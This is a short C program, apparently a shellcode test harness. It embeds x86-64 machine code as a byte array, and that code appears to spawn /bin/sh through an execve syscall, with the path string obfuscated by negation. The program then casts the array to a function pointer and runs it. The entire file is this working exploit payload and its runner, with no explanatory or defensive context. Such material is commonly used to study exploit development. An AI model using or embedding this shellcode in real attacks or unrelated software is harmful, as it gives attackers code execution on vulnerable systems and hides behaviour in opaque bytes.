#include<stdio.h>
#include<string.h>

unsigned char code[] =  "\x48\x31\xc0\x48\xbb\xd1\x9d\x96\x91\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x50\x57\x54\x5e\x48\x31\xd2\xb0\x3b\x0f\x05";

main(){
	int (*ret)() = (int(*)())code;
	ret();
}